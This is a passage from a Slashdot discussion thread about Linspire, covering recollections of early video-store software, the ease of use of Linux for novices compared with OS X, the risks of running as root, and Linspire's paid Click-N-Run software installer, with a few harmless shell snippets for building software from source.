      Not many at all. And, like I said, everyone that I know that worked there when the business was getting started remembers the time with fondness... so you achieved not only a successful business, but one that was good for all of the people involved, too. Including the video stores.

      Fifteen years later, I recognize that those achievments -- solving people's problems, creating good jobs and a fun work environment -- are much more important than good code. Had it been put that way to me then, I'm sure I would have seen it as well.

      But that code *was* a royal mess!

      BTW, the app I was working on was TSK. In my other post, I claimed you wrote that one, too, but I'm actually not certain that's the case. Did you?

      Also, just out of curiosity, what exactly was the reason for removing all whitespace in VSS?

      --
      Note to ACs: I usually delete AC replies without reading them. If you want to talk to me, log in.
    20. Re:Carmony is great by swillden · · Score: 1

      Welcome to programming. Your whole experience sounds pretty normal

      Normal in kind, yes, but not in degree. I've been writing code professionally for 15+ years now, and I've yet to join a project whose code didn't appear to be a mess, in hindsight, at least. Heck, I haven't written many of any significant size that I didn't end up wishing I had time to clean up.

      But after those first two apps, everything else has been a very minor mess. I guess I really should thank Kevin for showing me really bad code right out of the starting gate, so that I'd never again be surprised by cruddy code.

      --
      Note to ACs: I usually delete AC replies without reading them. If you want to talk to me, log in.
    21. Re:Carmony is great by Kevin+Carmony · · Score: 1

      You're absolutely right...producing jobs and products that solve problems is, IMHO, more important that beautiful code for code's sake. Here are some more interesting facts to this story... 1. My 21-year old son recently went to work for this company! He applied there because he, like his dad was at that age, also into computers and a hacker (only a much better one =). He applied there because it is close to where he is going to college (the company is just down the street from his school, the same college I attended). He didn't say anything about knowing me when he applied. It was only AFTER he was hired they put two and two together. Again, how cool is that? I started a business 20 some odd years ago (my son was just a new born at the time) that now employs him all these years later, as well as hundreds of others over all these years...including you for a time. =) 2. Correct, I didn't write TSK (The Store Keeper). I wrote VSS Plus (Video Shop Software Plus), which according to my Son is STILL in use today, even with some of that original code! However, guess who hacked TSK out? Tom Welch, Linspire's CTO! I can't wait to tell him. The engineers will have endless fun with this one. It's one thing for their "business" degreed CEO to be teased about his spaghetti code, but NOT our genius, coder extraordinaire CTO! Classic! (My code was perfect, of course. A real shame you didn't get a chance to admire it. ;-) 3. The reasons the white spaces were removed in both VSS and TSK is that back in those dark ages, the compiler couldn't load up a source code file to compile that was bigger than so many K (I forget the exact size limitation). Back then, this was a huge problem, as we were constantly having to really skimp on features or you'd create too large of a source file and couldn't compile it to a binary. We actually all got very good at inventing all sorts of cleaver ways around this problem with variable passing and linking. Unless you were a coder with compiled basic 20 years ago, you'd have no appreciation for all of this. Today, the dev tools are light years better than back then. Thanks for this blast from the past! Now, if you'll excuse me, I have a CTO to go tease. =) Kevin

    22. Re:Carmony is great by The+Cydonian · · Score: 1
      Oh, the irony of missing out on HTML formatting while replying to a comment on a lack of whitespace. :-D

      Sorry, had to point it out.

    23. Re:Carmony is great by swillden · · Score: 1

      My 21-year old son recently went to work for this company! He applied there because he, like his dad was at that age, also into computers and a hacker (only a much better one =). He applied there because it is close to where he is going to college (the company is just down the street from his school, the same college I attended).

      That is cool.

      This reminds me I haven't dropped by SIS for years. I need to go see if Max and Frank are still around. This conversation is something of a blast from the past for me, too.

      --
      Note to ACs: I usually delete AC replies without reading them. If you want to talk to me, log in.
    24. Re:Carmony is great by Kevin+Carmony · · Score: 1

      I believe they still are. Say hi and introduce yourself to Justin Carmony as well if you drop by! Kevin

    25. Re:Carmony is great by Kevin+Carmony · · Score: 1

      ROFL

      Yes, excellent point.

      This also, however, illustrates the difference between the "Linspire" mindset and the traditional "Geek" mindset. At Linspire we believe the forum software should get easier, not the user smarter. But, I appreciate the charm that is Slashdot. =)

      Kevin (in HTML =)

  13. myths? by Anonymous Coward · · Score: 1, Insightful

    just the fact that they've set out to dispel these myths, the fact that they ever, in any incarnation were ever actually true, is just a sad testament to their alignment and beliefs in the community.

    they aren't a real gnu/linux distribution because their business model and principles don't fit in with ours.

    they ever thought a superuser by default setup was good? who are you?

    lets repackage the apt repository and start selling .deb's! seriously?

    i've looked at the distribution, it looks like they've taken quite a bit of time to rebrand common applications, line openoffice and gaim, to be "linspire" applications. all that effort, or at least 95% of it should be put into doing something new and helpful for the community.. do something useful.

    sheesh.

    1. Re:myths? by ostermei · · Score: 1
      they aren't a real gnu/linux distribution because their business model and principles don't fit in with ours.
      And George W. Bush isn't a real American because his principles don't fit with mine.

      Just because you disagree with their principles/practices, that doesn't change the fact that Lindows does distribute a form of GNU/Linux. (Just as, in my above example, my disagreement with Bush's principles doesn't mean that he was born outside of the US... You can't change the intrinsic properties of something just because you don't like it) It's all built on a Linux kernel, and it includes GNU utilities. If that's not the definition of a GNU/Linux distribution, I don't know what is.
      --
      "Outside of a dog, a book is man's best friend. Inside of a dog, it's too dark to read." -- Groucho Marx
  14. Long Overdue by drDugan · · Score: 3, Insightful

    After reading TFA and reading about CNR, all I can say is... great. I had written off Linspire when I first read about it - the wine stuff that I knew was impossible and buggy... etc. But the philosophy is a good one: bring Linnux under the hood on a polished, housewife/housewide audience - not just the hackers.

    I wish him all the best. Now I'll get back to trying to my dkpg-reconfigure and apt-get'ing the latest Ruby Gem from unstable while not upgrading my Standord C libs.

    1. Re:Long Overdue by Momeca · · Score: 1

      The philosophy worked for me. I recently bought a computer with Linspire installed. I don't know much about Linux or any OS. But I had it up and running as well as needed (web browser and email, nothing else matters) in a few minutes. The hardest part was finding a knife to open the box.

  15. Linux Needs DRM to Succeed by carrier+lost · · Score: 1

    Something they don't mention in that article:

    "Linspire's chief technical officer, Tom Welch, agreed that his company would definitely consider DRM."

    http://news.com.com/DRM%20key%20to%20Linuxs%20cons umer%20success/2100-7344_3-6058790.html?tag=techdi rt

    MjM

    1. Re:Linux Needs DRM to Succeed by Al+Dimond · · Score: 1

      What does it mean for Linspire to "consider" DRM? Operating systems don't decrypt DRMed media files, programs do. There's only one company that can authorize development of software to play iTMS songs on Linux, and that's Apple.

      If they mean crippling the user with "features" like "secure video path", I think they'll soon find that implementing controls like that in a Free operating system is very hard. It might be possible with trusted computing, which if I understand correctly gives user programs a way to identify the kernel without making a call into the kernel.

  16. MOD PARENT UP! by networkBoy · · Score: 1

    I wish I had points, that's awesome :)
    -nB

    --
    whois gawk date unzip strip find touch finger mount join nice man top fsck grep eject more yes exit umount sleep dump
  17. The reality of Linspire by Bob+Loblaw · · Score: 5, Informative

    In reality, no OS has achieved the status of so simple yet so useful that grandma/sister/computer-novice can use without assistance.

    I have some experience being the family IT support guy and got so sick of cleaning our viruses, spyware and other junk from my sister's computer that I bough her a computer with Linspire 4 on it thinking that it was the easiest Linux for her to adapt to. In the end, I can't say that it was any better or worse than any other distro. The Click-N-Run concept is a good one but it is was very poorly executed. It certainly *did* encourage users to run as root and was a PITA to set up as a multi-user system.

    However, when things went wrong (as they do with any OS/Distro/computerized thing), I found that Linspire did things differently enough that it was very difficult to troubleshoot the problem, find help online and you ended up fighting with a system that tried to second guess you with automated scripts ... sort of like dealing with Windows sometimes.

    In the end I switched her to another distro (Ubuntu) and now have just as many problems but I don't have to pay a subscription fee and, if I don't know the answer myself, I can find answers online extremely quickly since it doesn't deviate too far from upstream.

    So all the power to Linspire in achieving that "easy enough for a novice to use" status but since we're not there yet, I would stick with a more maintainable distro like Ubuntu or Fedora Core.

    1. Re:The reality of Linspire by diamondsw · · Score: 1, Insightful

      In reality, no OS has achieved the status of so simple yet so useful that grandma/sister/computer-novice can use without assistance.

      Ahem.

      --
      I don't know what kind of crack I was on, but I suspect it was decaf.
    2. Re:The reality of Linspire by lizardghp · · Score: 0

      good point - there is no easy computer for any novice - and most linux distros now are all point and click just differnt icons - thats my point to friends i say linux is just as simple - a lot of people think linux is still cli - there is no simple computer to use - i spend more time telling people what an address bar is - i ran linspire i only found it hard due to it not having the linux shell cabiblities Linspire 5.0(i think its been a while sue me if im wrong) and it doesnt have the windows system file - i would never recommend linspire cause of like you say it is difficult to trouble shoot is it windows is it linux its neither its like the ''PAT'' of operating systems

      --
      The World Is Yours ~ Tony Montana
    3. Re:The reality of Linspire by Bob+Loblaw · · Score: 1

      I thought of that but stand by my statement. Apple hasn't achieved that ultimate status either.

      While problems occur more rarely due to Apple's narrrow variety of hardware/software vs. higher stability trade-off, when problems do occur, or when you want to do something outside of Apple's scope of applications, *no one* can help you.

      So while Apple's method may be good for many people you have to realize that you are sacrificing something (choice) to get something (stability).

      Most of the problems that I have experienced with my sister's migration stem from her wanting to use particular apps (retraining issues) and particular hardware (compatibility issues). Things where choosing Apple wouldn't have helped me one bit and, in fact, would have limited her significantly. There is no doubt that she could have lived without some of her wants (and she ends up having to do so even now) but I was trying to find the best fit for her; not fit her to something.

    4. Re:The reality of Linspire by writermike · · Score: 1

      Most of the problems that I have experienced with my sister's migration stem from her wanting to use particular apps

      I have to applaud for trying this on your sister. I don't think you mentioned an age, but I presume she's not geriatric. I would cringe to put anyone young on Linux. The tears when they realize they can't download iTunes or AOL Explorer! *shudder*

      --
      If Nalgene water bottles are outlawed, only outlaws will have Nalgene water bottles.
    5. Re:The reality of Linspire by Bob+Loblaw · · Score: 1

      Actually she is older than me ... in the 39 and holding age range :]

      The things that have bitten me so far:
      - not being able to use a Sony Minidisc player (stupid DRM-encumbered crap) she had bought without asking me which player to buy first
      - running her version of QuickBooks (v4 IIRC) ... *nearly* everything works under wine, except printing oddly enough. I haven't tried with recent updates though. This is the one thing causing the old computer to persist.
      - slight font size differences causing massive page reflows in crowded .docs that look normal in MSOffice (though likely shouldn't) and get chopped up in OO.o. While you can always mess around and make it look normal again, it takes some time and knowledge of fine tuning documents.
      - flaky USB Palm Pilot syncing. I have had the best luck with JPilot but unfortunately filled her Visor up with gibberish one time when there was an accidental transition to UTF-8 encoding :]
      - there is some persistent suspend issues

      The things that have surprised me:
      - she managed to independently download and install an online poker application and run it fine using wine in Ubuntu for a while before it died on a wine update and she called me wondering why it doesn't work anymore. So much for package management. I asked her to use one of the web based ones that advertise Linux-friendliness.
      - not too many printer or scanner problems. There was a bit of set up and picking of rational defaults but after that smoother sailing than I thought
      - remote VNC desktop tunneled through an ssh connection was a snap to set up eventhough she is behind a NAT router. This makes troubleshooting *sooo* much easier when I can see what she is talking when she refers to "the square thing in the corner thing with the blue thing" :]

      The #1 thing that I am happy about:
      - Never having to run any more stupid spyware cleaning utilities and virus checkers on her system. I don't miss that futile exercise.

    6. Re:The reality of Linspire by msouth · · Score: 1
      In reality, no OS has achieved the status of so simple yet so useful that grandma/sister/computer-novice can use without assistance.


      My mother and father bought an iMac last year and as far as I know none of us helped them set it up. Neither of them have any background with computers. To put it succinctly, I don't think your comment is true about OS X. If you are tired of being the family IT guy, I would seriously recommend you get them an entry level mac and let them go.
      --
      Liberty uber alles.
    7. Re:The reality of Linspire by Bob+Loblaw · · Score: 1

      So what will happen when the following common and inevitable scenarios arise?
      1) A security vulnerability that requires an update
      2) The OS is unsupported and needs to be updated
      3) The harddrive is filling up and more space needs to be added
      4) All their data needs to be backed up in case of a hardware failure

      Sure ... you can plop down a preconfigured OS in some preapproved hardware and never connect it to the Internet and even the most novice of computer users is not going to have a problem. This is true of many configurations ... not just OSX. But the reality is typically much more complicated.

      So while you may be a Apple fan and it may be working out in your situation, it is not yet the ultimate solution with respect to simplicity vs. usefulness. It is a great solution for a limited number of usage cases and a crappy solution for some others ... and this is, of course, very subjective.

      I got tired of supporting Windows so I figured that I would give Linspire a try since it advertised user-friendliness. I was a bit disappointed with it and didn't want to pay for another OS (and keep on paying for updates and keep paying more of the apps to do what she needed to do) so I switched her to Ubuntu. I have been fairly pleased since thenand most of the calls these days are dealing with ISP outages. I am not sure how your suggesting of throwing out all her hardware and moving to a Mac would help.

    8. Re:The reality of Linspire by msouth · · Score: 1
      So what will happen when the following common and inevitable scenarios arise?
      1) A security vulnerability that requires an update
      2) The OS is unsupported and needs to be updated
      3) The harddrive is filling up and more space needs to be added
      4) All their data needs to be backed up in case of a hardware failure

      1) The computer lets you know that there is a security update and you type in your password to install it.
      2)
      (a) It will probably still do whatever you were doing with it the day before it officially became unsupported.
      (b) If I recall correctly, my wife did the installation when we updated OS X last time. Have you ever installed a new version of OS X? I'll bet my mom could do it.
      3)
      (a) Get an external drive. Remember that by choosing a proprietary operating system, we've already agreed that convenience is more important than doing everything as cheaply as possible. You could grab a firewire drive, plug it in, and it would just work. Problem solved.
      (b) Novice computer users typically don't use space as fast as we do. My mom's last computer (also an iMac, but OS 9, and yes, we did have to help out with that one a lot more) only had like 7 gigs and she never had more than a couple full if I remember right.
      4) Typically we have just lived on the edge, because my parents don't have a bunch of stuff that they care about--they are using the machine mostly for web browsing and email. So I have no experience with getting their stuff backed up. However, I'll bet in less than an hour of searching we could find a solution that would give you a complete backup system that a novice could use. Even if they wanted to do a DIY solution for that, they could pop in a blank dvd (which will open for them in the Finder), drag their important folders to it and click burn.

      As far as this particular comment goes:
      ...I switched her to Ubuntu. I have been fairly pleased since then and most of the calls these days are dealing with ISP outages. I am not sure how your suggesting of throwing out all her hardware and moving to a Mac would help.


      In the first place, I was responding to this:


      In reality, no OS has achieved the status of so simple yet so useful that grandma/sister/computer-novice can use without assistance.


      You didn't say "no OS that will install on my mother's current hardware."

      All I'm saying is that it doesn't sound like you have tried OS X. It isn't problem free, but, like I said, my mom and dad are up and running and none of us ever had to lift a finger to help. That sounds a lot to me like the solution you were claiming didn't exist.

      Also, in your previous post you sounded like you were still unsatisfied with the solution you had (something about "just as many problems"), and now suddenly it's all fine. If it's all fine, fine. I was only suggesting that you try OS X because you sounded like you were still unhappy with what you had. It is not perfect, but in my opinion it solves the problem you posed.
      --
      Liberty uber alles.
  18. good stuff by aurelito · · Score: 4, Insightful

    People on Slashdot often speak of Linux as if it's a finite resource: that if Linspire takes off, it must mean distributions like Slackware or Debian or Gentoo are losing users. That's not true at all. Linspire's target market is a niche previously untapped (not even by Ubuntu or short-lived Caldera) of people who just want a workstation with a web browser, a word processor, a calculator and maybe solitaire. All the power to to Linspire for doing this. There's room in the Linux world for this. I think they're doing a useful thing, and if they come up with some good, non-crippling ideas that improve usability, perhaps other distros will benefit from their innovation one day too.

  19. Funny how things change by stevey · · Score: 4, Informative

    It was only a short time ago that Michael Robertson, CEO of Linspire said "I defy anybody to tell me why is it more secure to not run as root. Nobody really has a good answer. They say 'oh, yeah, it is!', but it really isn't."

    1. Re:Funny how things change by rudegeek · · Score: 1

      "I defy anybody to tell me why is it more secure to not run as root. Nobody really has a good answer. They say 'oh, yeah, it is!', but it really isn't."

      Quick, someone point him to rm manpage!

      --
      Rocksteady, are you ready to ska?
    2. Re:Funny how things change by joshv · · Score: 1

      I've been running Windows as an admin user every since NT4. Never had a single virus.

      Most worms will infect a system regardless of the security rights of the user. Much malware will be thwarted by a limited rights user account, but I am smart enough not to download and install that sort of crap.

    3. Re:Funny how things change by Anonymous Coward · · Score: 0

      I, too, have successfully been running MS Windows as administrator ever since the original Windows FIND SEXY GIRLS IN YOUR AREANT came out, and haven't had a single virBUY CHEAP V1AGRAus or piece of malwaGET A BIGGER PEN1S NOW!!re. I don't understand what everyone isFREE PORN so upset about...

    4. Re:Funny how things change by beaviz · · Score: 1

      He said a lot of interesting things. But apparently it got mixed up with some noisy talk about Windows. Nasty. Here is the original text:

      I too FIND SEXY GIRLS IN YOUR AREA and BUY CHEAP V1AGRA or GET A BIGGER PEN1S NOW!! I understand FREE PORN.

  20. Installed it for the wife... by Sfing_ter · · Score: 2, Interesting

    I installed it on my wife's computer and my best friends,(both windows zealots), because they were constantly asking me to clean their computers. They would not use the tools they were given to work safely so... Linspire, and no more issues. I used wine to install IE for the wife because her job requires her to use IE only sites, other than that, it's all linux. they uses firefox at work, and the differences between OOO2 and ms office threw them at first but after a few, we do that this way...(kind of like going from office 95 too office 2k), they were both fine. Linspire pays it's mp3 tax and has a dvd player built into the distro so you have all the stuff they need. Plug in an HP multi-funct printer and scan, file, fax away . I don't use it because it is "behind", stable yes, but behind the bleeding/edge curve I like to stay on... :)

    --
    A computer once beat me at chess, but it was no match for me at kick boxing. Emo Philips
  21. Linspire by Orion+Blastar · · Score: 1

    I own a copy of Linspire, I actually paid money for the 4.5 release. I wanted to try it out. They made programs that use Microsoft Windows format files like their own Media Player and iTunes type programs. They offer a lot of FOSS and Commercial Programs via the CNR (Click N' Run) program, and it also does the updates as well.

    I switched distros. Linspire, while based on Debian, disables the apt-get and rpm tools. I found a way to activate them, and install a gcc compiler to compile programs etc. Only I found out the hard way that the CNR libraries are behind the apt-get and rpm libraries and it causes a problem with Linspire reporting that non-standard libraries are installed. It was a picture of a man being hung on his own underware or something. I was told that only CNR install methods are supported by tech support.

    CNR is fine for the noobs, it makes getting Linspire programs as easy as clicking on them. It requires a monthly or yearly subscription though. For a noob willing to pay for access to software and doesn't require learning how to use chmod and command line tools like apt-get and rpm to install software, it is a good deal.

    I switched to many distros, Debian, Unbuntu, Kanotix, Knoppix, and finally Red Hat Fedora. Red Hat Fedora is good enough for me, I learned how yum works and I am compiling programs and using rpm as well. I set up my own web server, but I have prior experience with Linux.

    The whole goal of Linspire seems to be making it default on retail PCs, like at Walmart. Linspire has tried to get the cost of a PC down to $300, because Linspire does not cost any more than $50 to sell and it includes OpenOffice.org and Microsoft Windows and MS-Office can cost $300 or more of a system price.

    There have been times when Linspire offered their OS free via BitTorrent via promotions.

    Still I have set up friends with Red Hat Fedora because it does not require a subscription to update the OS files, and it is easy enough for them to use.

    --
    Remember, Slashdot does not have a -1 disagree moderation, and no, troll, flamebait, and overrated are not substitutes.
    1. Re:Linspire by Ynazar1 · · Score: 1

      So you're saying that you tried 5 flavors of Debian and then switched to Fedora? Okay. Guess two does count as many on some level.

    2. Re:Linspire by Orion+Blastar · · Score: 1

      Actually it was:

      Debian
      Knoppix
      Kanotix
      Unbuntu

      Linspire was Debian based as well, which makes it five versions of Debian that were tried before the Fedora switch.

      --
      Remember, Slashdot does not have a -1 disagree moderation, and no, troll, flamebait, and overrated are not substitutes.
  22. I've heard that claim before by Anonymous Coward · · Score: 0

    I've seen the "it's linux, but so easy to use that newbies can install it!" claim promised many, many, many times before. Rarely, if ever, have I seen it delivered on.

    So I actually should believe that Linspire succeeded where Mandriva managed to just do kind of meh? Is there any way to get evidence of such?

  23. Re:Isn't it obvious ? by tonymus · · Score: 3, Informative
    "It isn't about Linux but it is about making money, simple. However, unlike other companies this one only takes and doesn't give anything in return."
    Go to http://www.linspire.com/lindows_products_license.p hp#ope, and scroll down to "Open Source Support, Projects & Initiatives", dumbass.

    It's brain-dead morons like this guy spreading bald-faced lies that makes it hard for any commercial linux distribution to succeed...

  24. I don't understand... by Belial6 · · Score: 1

    I don't understand when people complain about PC, and Linux in perticular as being difficult to use. Administer? maybe. Use? No.

    Now, just like any parent, I would love to believe that my wife and I had so superior of genes that our offspring is simply genetically superior by a far margin than the rest of the population. We would also love to believe that our parenting skills are so much better than everyone elses that any child in our care is destined to be a genius. Unfortunatly, we also understand that that is unrealistic.

    That being said... At 22 months old, I gave my son his first computer. I installed Ubuntu, and gcompris on it, and showed him the game that makes blocks disappear when he moves the mouse over them to reveal a picture of an animal. At that point, I just let him go. By his 2 year birthday (last month), he figured out how to turn the computer on, go to the 'Applications' menu, find the programs he wants to use, and navigate the programs. (Mostly gcompris).

    So, while I would LOVE to believe that my offspring has both superior genes, and a superior environment to everyone else on the planet, realistically, I have to believe that anyone saying they cannot use a computer is retarded.

    If you disagree, and in fact think that my 2 year old son is smarter than all these people that complain about computer difficulty, you are welcome to flame away. Maybe you will convince me of his supreame superiority. Until then, I will assume those that cannot figure out how to use Windows/Gnome/KDE are just retarded.

    1. Re:I don't understand... by Bob+Loblaw · · Score: 2, Insightful

      There are a few factors at play here ... and none of them are retardation :]

      1) scope of usage:
      If your 2 yr old is writing letters, emailing, printing, transferring pictures from their camera, burning music CDs, balancing their bank account, tracking their stocks, etc. then I will be impressed by your superior genes. However, many people have no problems doing the simple things like finding a game and playing it. Yet with complexity comes difficulty.

      2) familiarity
      If someone has learned a particular way of doing things, they have a tough time switching gears into a new paradigm/UI/menu structure. Your kid benefits from having a clean slate and will probably be hesitant to switch to anything else later on.

      3) inflexibility
      The older you get, the more inflexible you brain seems to get. You want things *your* way ... just like the good ol' days! Some people manage to keep a nimble brain as they age but it takes mental exercise to do so and the vast majority of people let their brain get flabby. I don't blame them as the work environment is structured to flabbify your brain as you advance through it. Less precarious due to more power, less challenging, more specialization and leaning on previous experience, etc. Your kids' brain is still a knowledge sponge. :]

      So, sorry, you are not super-human.

    2. Re:I don't understand... by Belial6 · · Score: 1

      1)Scope of usage: Yes, he writes letters, and prints. They may not all be actual words he is typing, as he is only now learning to spell, but yes, he does write letters. He also plays CD. Doesn't burn, but does play them. I know that I, and I suspect you do as well, regularly hear how difficult it is to do these things. Also, when you are talking about the Gnome vs. Windows difficulty, none of this applies.

      2)familiarity: I would put this in the 'retarded' category. If you can't associate "Start" for applications to "Applications" to applications, you have a serious problem. Combine the fact that most adults can read, any with even a reasonable level of intellegence should be able to run circles around a two year old in figuring out how things work. Maybe you should say that if someone learns a perticular way of doing things, they often REFUSE to switch gears into a new paradigm/UI/menu structure. Which leads to...

      3) inflexibility: At the point in time that you cannot pick up new information faster than a two year old, you should accept that your dumb. You may be dumb because your brain is deteriating, you may be dumb because you were never smart, or you may be dumb because you have made the consious decision to be dumb. Either way, not being able to figure out things that a two year old can figure out means your are really really dumb.

      So, like I said, as much as I would love to believe that my child is super-human, I am truly doubt that that is the case, and suspect that the complaints of difficulty are caused by the very stupid, and people that WANT it to be difficult when in fact it is not difficult at all.

    3. Re:I don't understand... by hazah · · Score: 1

      If your 2 yr old is writing letters, emailing, printing, transferring pictures from their camera, burning music CDs, balancing their bank account, tracking their stocks, etc. then I will be impressed by your superior genes. However, many people have no problems doing the simple things like finding a game and playing it. Yet with complexity comes difficulty.

      Why can you not simply point and click on the icon? Are you having trouble finding it?

      If someone has learned a particular way of doing things, they have a tough time switching gears into a new paradigm/UI/menu structure. Your kid benefits from having a clean slate and will probably be hesitant to switch to anything else later on.

      Here you are claiming that pointing and clicking is different (and thus more difficult) than pointing and clicking. Why?

      The older you get, the more inflexible you brain seems to get. You want things *your* way ... just like the good ol' days! Some people manage to keep a nimble brain as they age but it takes mental exercise to do so and the vast majority of people let their brain get flabby. I don't blame them as the work environment is structured to flabbify your brain as you advance through it. Less precarious due to more power, less challenging, more specialization and leaning on previous experience, etc. Your kids' brain is still a knowledge sponge.

      No, first, that's only what people think. A human is a human. A human can adapt, and will once feels that it is required of him/her. Second, the good old days rhetoric is nothing more than a cliche spoken by middle aged idiots. There are no 'good old days'. Besides getting into the physics of the 'existence of the past', it's not hard to see that any day is just like any other day. The old days were just as shitty, and if someone can't see that, then I don't really know why anyone actually bothers listening to them, as they don't actually provide insight, they provide delusions.

      You do not have to let your brain get flabby. All you need to do for that is just be lazy. The only problem I can see with your logic, really, is this creepy consensus that it's okay for some people to walk right over others. Don't you realize what you have just said? This enviornment you just mentioned? It's the only reason that you can get this lazy. If anything, it's a negative feedback loop. I don't understand how anyone, giving this any serious thought, could miss that.

      But the meat of it all, is that you don't blame them. Why not? Is it because they are blind? Are you sure that the kids won't pick up on this same selective blindness as a result?

  25. Actually, it's not crappy by ylikone · · Score: 1
    I just switched grandma over from windows 98 to Linspire. I set it all up for her and she can install all the software she wants using the CNR system, which makes "one click install" a reality. So far she likes it. Her printer worked fine without any additional setup, as did her digital camera. And underneath, it's just a modded version of debian. Seems "not crappy" to me so far.... although I do agree that it is a Linux system for people that don't want to be bothered with tweaking everything to make it work. I personally run ArchLinux and Debian on my boxes and all I can say is that Linspire really does make Linux "easy" for the masses.

    Oh, and if you are going to purchase Linspire, make sure you google around for a discount code. Somebody is always offering a discount code for Linspire somewhere.

    --
    Meh.
  26. Installing programs is SUPER EASY! by ylikone · · Score: 4, Informative
    I just set grandma up with Linspire. I did the initial install and yes, it is easy but still not something I would let grandma do herself. I wouldn't let grandma install any OS by herself.

    The part where it REALLY is easy is software installation. They have a system called CNR (Click and Run) which costs $20/year, but it is well worth it. You get a icon on your desktop that you can click, then browse software categories. When you find something you like, just click the install button and voila, CNR downloads it, puts an entry in the Start menus and puts an icon on the desktop. No other distro that I know of does this with such ease.

    --
    Meh.
    1. Re:Installing programs is SUPER EASY! by Fred_A · · Score: 1
      Are really you trying to say that it's that much simpler than
      # tar xzf newcrap-0.0.4.tar.gz
      # cd newcrap-0.0.4
      # ./configure && make && make install
        [ ... ]
        make: Error 1
      # cd src
      # vi main.c
      # cd ..
      # ./configure && make && make install
      # [ ... ]
        make: Error 1
      # cd ..
      # rm -rf newcrap-0.0.4*
      Well, ok, but what's the fun in just clicking in a menu ?
      --

      May contain traces of nut.
      Made from the freshest electrons.
    2. Re:Installing programs is SUPER EASY! by bikkuri · · Score: 1

      Gentoo Linux has a program which is just as easy to install programs with. To install a program under gentoo all you need to do is type emerge --search **** and name of program for wich you want then type emerge and the program name. and gentoo also allows you to specify variables which best suit your needs.

    3. Re:Installing programs is SUPER EASY! by Millenniumman · · Score: 1

      In OS X all you have to do is drag it to your Applications Folder (or another folder). Would that be very hard to implement in Linux?

      --
      Stupidity is like nuclear power, it can be used for good or evil. And you don't want to get any on you.
    4. Re:Installing programs is SUPER EASY! by Dolda2000 · · Score: 1
      You get a icon on your desktop that you can click, then browse software categories. When you find something you like, just click the install button and voila, CNR downloads it, puts an entry in the Start menus and puts an icon on the desktop. No other distro that I know of does this with such ease.
      I'm not saying you're not right, but from that description it sounds exactly like both Ubuntu's "light-weight" synaptic (I don't know what they call it, apart from "Add or remove software") and FC's Pirut. Is there any significant difference?
    5. Re:Installing programs is SUPER EASY! by Nakarti · · Score: 1

      That's exactly Linspire's point: *we* find that to be *easy*, but where do you type it, how do you know what to search for when you want a word processor, especially if you don't really know the term "word processor" but just that you want to write a business letter.
      If emerge's search is anything like apt-cache's, most of the users I've dealt with would quit at that step.

    6. Re:Installing programs is SUPER EASY! by emurphy42 · · Score: 1

      The biggest step in that direction that I'm aware of is GoboLinux.

    7. Re:Installing programs is SUPER EASY! by Anonymous Coward · · Score: 0
      Meh. I just automate once as a Bash function and forget about it.
      function install
      {
          tar xf $1 &&
          SOURCE_DIR=`tar tf $1 | head -n1` &&
          pushd $SOURCE_DIR && ./configure &&
          make &&
          sudo make install &&
          popd &&
          rm -rf $SOURCE_DIR;
      }
      Afterwards all it takes is this simple command to compile, install, and remove the build directory:
      $ install tarball
    8. Re:Installing programs is SUPER EASY! by ElleyKitten · · Score: 1

      >>In OS X all you have to do is drag it to your Applications Folder (or another folder). Would that be very hard to implement in Linux?

      That's basically what I did to install Firefox 1.5 in Ubuntu. Since Mac is also, a *nix, it isn't that hard to make Linux do what Mac does. I however, prefer apt-get, though for newbies the Mac way would be easier.

      --
      "What is Internet Explorer 7? Are you saying we can't access the normal internet?" - I love tech support. Really.
    9. Re:Installing programs is SUPER EASY! by ElleyKitten · · Score: 1

      >>'m not saying you're not right, but from that description it sounds exactly like both Ubuntu's "light-weight" synaptic (I don't know what they call it, apart from "Add or remove software") and FC's Pirut. Is there any significant difference?

      I don't remember seeing an icon on my desktop for synaptic when I first installed Ubuntu. Also, Ubuntu's synaptic and apt-get don't always put shortcuts to the program in the applications menu, which was really frustrating to me until I figured out where it was installing things.

      I think the biggest benefit of Click-and-Run is that it makes installing programs easy for Windows users trying to figure out linux. On Windows, "Add and Remove Programs" isn't very useful for adding programs; Windows users are used to going to the web and finding the programs they want to install. While the programs in synaptic are technically on the web, they're not in a browser and that's not intuitive for Windows users. Click and Run makes it intuitive for them.

      --
      "What is Internet Explorer 7? Are you saying we can't access the normal internet?" - I love tech support. Really.
    10. Re:Installing programs is SUPER EASY! by marcello_dl · · Score: 1

      I don't remember seeing an icon on my desktop for synaptic when I first installed Ubuntu.

      I do not recall either, but I guess parent was challenging you on the ease of use concept instead of the number of desktop icons.
      Saying it's easier to have your desktop cluttered by icons instead of using the menus is entirely subjective. Using whatever desktop is out there, be it osx win or linux, requires you to deal with menus for basic operations, so a clearly labeled install/uninstall programs menu entry offers no particular challenges.
      The directness of a desktop icon is challenged not only by clutter, but also by windows that get on top of it.

      The preview of installed apps is a clear advantage over no preview, of course. But how many times would a screenshot be relevant over a text description that every package manager offers? and does it justify paying for a subscription?

      --
      ---- MISSING MISCELLANEOUS DATA SEGMENT --- [sigdash] trolololol
    11. Re:Installing programs is SUPER EASY! by ElleyKitten · · Score: 1

      >>I do not recall either, but I guess parent was challenging you on the ease of use concept instead of the number of desktop icons. Saying it's easier to have your desktop cluttered by icons instead of using the menus is entirely subjective. Using whatever desktop is out there, be it osx win or linux, requires you to deal with menus for basic operations, so a clearly labeled install/uninstall programs menu entry offers no particular challenges.

      To the I-only-know-windows-and-even-that-just-barely crowd that Linspire is targeting, the desktop is *very* important. Menus can be confusing, *especially* on a new computer or operating system. On top of that, Windows users don't expect to go through the menu to find an install/uninstall program, they're used to going to the internet to download programs. Seeing a browser icon on the desktop that says "install new programs" (or whatever it says) makes sense to windows users in a way that a menu item never ever could.

      >>The preview of installed apps is a clear advantage over no preview, of course. But how many times would a screenshot be relevant over a text description that every package manager offers? and does it justify paying for a subscription?

      The subscription price isn't worth it to me, because I'm happy with apt-get. But apt-get is not intuitive, and even synaptic you need someone to teach it to you. Linspire's CNR could be the difference that lets a new linux user figure out how to install new programs all on their own, versus giving up and going back to Windows. That I think is very valuble.

      --
      "What is Internet Explorer 7? Are you saying we can't access the normal internet?" - I love tech support. Really.
  27. Who modded this as "troll"? by ylikone · · Score: 1

    Are you working for MS or what?

    --
    Meh.
    1. Re:Who modded this as "troll"? by Anonymous Coward · · Score: 0

      Probably a Synaptic fan, because Synaptic does exactly what you describe for free.

      Synaptic does need some polish though, the program descriptions are far from user friendly. Could be prettier too. Otherwise, it scores bitchin!!! out of ten in my book.

    2. Re:Who modded this as "troll"? by ylikone · · Score: 1

